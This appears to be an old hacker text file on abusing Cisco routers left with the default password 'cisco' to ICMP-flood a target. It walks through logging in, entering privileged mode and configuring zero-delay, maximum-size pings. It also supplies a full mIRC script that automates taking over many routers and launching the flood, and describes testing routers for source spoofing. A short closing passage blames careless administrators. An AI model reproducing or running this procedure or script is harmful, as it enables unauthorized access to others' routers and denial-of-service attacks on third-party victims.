ICMP dangers hiding on non-protected Cisco routers Lots of people may already have heard about those IRC DDoS bots, that could easily flood down individuals or even web-sites. However it might be a bit hard or at least requires alot of work to spread the trojan to all hosts that are later used to generate the malicious traffic (UDP and ICMP in most cases) that disconnect dial-up users from the Internet, makes cable/adsl/etc. users lag badly and slows down web servers. Well, ICMP flood traffic can be generated by a malicious user more easily, no DDoS zombies is required. Thanks to all security careless administrator we have a situation here that allows anyone to use those non-protected Cisco routers (what are ment to protect their actual servers in most cases) to generate huge amount of ICMP echo reguests (pings) against a target host. And we should remember those routers are usually equipped with good bandwidth, what makes the ping attack more powerful. The actual situation is like following: A malicious user runs a scanner that is focused to find Cisco routers that are protected by a default password (in this case the default password is "cisco"), after he has found enough non-protected routers he may telnet into each of them and manually set them all to ICMP flood a target host. Take a note that all this is made possible by a security careless administrators that doesn't bother to set a new password for their routers. How does one set a Cisco router to ICMP flood a certain host? Telnetting into a Cisco router and setting it to flood a certain host doesn't require much knowledge about how routers work, actually the attacker may have no idea about routers or what they are, but some knowledge of Ping command and ICMP flooding is enough for a malicious user to cause havoc. Next I'll show line by line what the malicious user actually does when connected to a non-protected Cisco router: (this is the password if administrators haven't bother to change it) (this command turns on priviledged mode what is needed to modify some important ping settings) (the password need to be inputted again in order to change to priviledged mode) (protocol) (can't be more than 18024) (0 for flooding) (no) (no, if putting y or yes here you would get extended commands) Now the router will start ICMP flooding a specified victim and the hacker can telnet into another router and perform the same steps there. As you might have noticed, telnetting into each router one by one is slow and requires "lots" of work. Well, this can be done more easily without opening up telnet client and teletting into each router. I included a small mIRC script to this text to explain how you can control the routers easily from your mIRC client. alias cisco { inc %cisco.open | sockopen cisco [ $+ [ %cisco.open ] ] $1 23 } alias cisco-clr { set %cisco.open 0 | sockclose cisco* | set %cisco.nuke.notice on } on 1:sockopen:cisco*:{ .timer 1 1 sockwrite -n $sockname cisco .timer 1 1 sockwrite -n $sockname enable .timer 1 1 sockwrite -n $sockname cisco .timer 1 1 sockwrite -n $sockname ping .timer 1 1 sockwrite -n $sockname ip .timer 1 1 sockwrite -n $sockname %newk.ip .timer 1 1 sockwrite -n $sockname %pngtimes .timer 1 1 sockwrite -n $sockname %psize .timer 1 1 sockwrite -n $sockname %delay .timer 1 1 sockwrite -n $sockname n .timer 1 1 sockwrite -n $sockname n } alias cisco-w { window -naek0 @Cisco /cisco Arial 12 } menu channel { - [Cisco] .Flood IP [ %newk.ip ]:/set %newk.ip $$?="Enter IP to flood " | /echo -a *** Done now type /cisco routerip to begin flooding .Set Times To Ping a Target [ %pngtimes ]:/set %pngtimes $$?="Times to send a ping" | /echo -a Done .Set ICMP Packet Size [ %psize ]:/set %psize $$?="ICMP packet size (must be between 30 and 18024)" | /echo -a Done .Set Delay Between Packets [ %delay ]:/set %delay $$?="Delay Between ICMPs in Secs (0 for flooding)" | /echo -a Done .- .Stop Flooding:/cisco-clr .- } on *:sockread:cisco*:{ if ($sockerr > 0) return sockread %cisco if ($window(@cisco,1) == $null) { cisco-w | goto next } :next if (send isin %cisco) && (%cisco != $null) { echo @cisco %cisco } if ($chr(33) isin %cisco) { echo @cisco $sock($sockname).ip - %cisco } else { halt } } ;telnet alias telnet { set %telnet.n $2 sockopen telnet %telnet.n 23 echo @telnet -Connecting- } alias telnet-w { window -naek0 @Telnet Terminal 12 } on 1:input:@telnet:{ if ($1 == /telnet) && ($2) && (!$sock(telnet).ip) { telnet $1- } if ($1 == /telnet) && ($sock(telnet).ip) { echo @telnet -Already Connected to $sock(telnet).ip $+ - } elseif ($sock(telnet).ip) { sockwrite -n telnet $1- | echo @telnet -> $1- } } on 1:sockopen:telnet:{ echo @telnet *** CONNECTING } on 1:sockclose:telnet:{ echo @telnet *** DISCONNECTED } on 1:sockread:telnet:{ if ($sockerr > 0) return sockread %telnet if ($window(@telnet,1) == $null) { telnet-w | goto next } :next if (%telnet != $null) { echo @telnet %telnet } } menu @telnet { connect:/sockopen telnet $$?="Enter Ip" disconnect:/sockclose telnet | echo @telnet *** DISCONNECTED The above script simply connects to the router and sets it to flood the victim host. As you can see, it support variables such as how many times to ping a target and ICMP packet size (all the variables must be set from pop-up menu on your mIRC client before connecting to the router). This script may become useful if you have collected many non-protected routers, you have to only set the asked variables and then use this script to connect and set all routers to flood a victim, on this way it's ways faster than telnetting each router manually one by one. However, this script doesn't give a support for those routers that allow outgoing spoofed packets (no one wouldn't like to pass spoofing ability if it is available). To test if the router support spoofing a malicious user would modify extended commands when the router asks for them, and there set a different source host for the packets, if the router reports invalid source address after setting a source host it means the router doesnt' give a support for spoofing (the earlier example and the mIRC script bypassed extended commands). What makes this "router attack" method possible? First of all, administrator who haven't set a password to protect their routers have let a huge security risk firstly to their own networks, but they have let a security risk regarding third-party users too. As the above text shows, a non-protected router would be a part of a DDoS attack against a third-party network/individual etc. Another thing I'd like to mention is pinging capabilities of those routers. if they didn't support huge amount of sent packets, zero second packet delay and big packet sizes, ICMP attacks performed from routers wouldn't be a serious problem. I don't see any real usage for ability to ping hundreds (thousands) of times a certain host, nor do i see any usage for zero second delay between packets or big packet sizes what those routers allows. hypnosis , Hal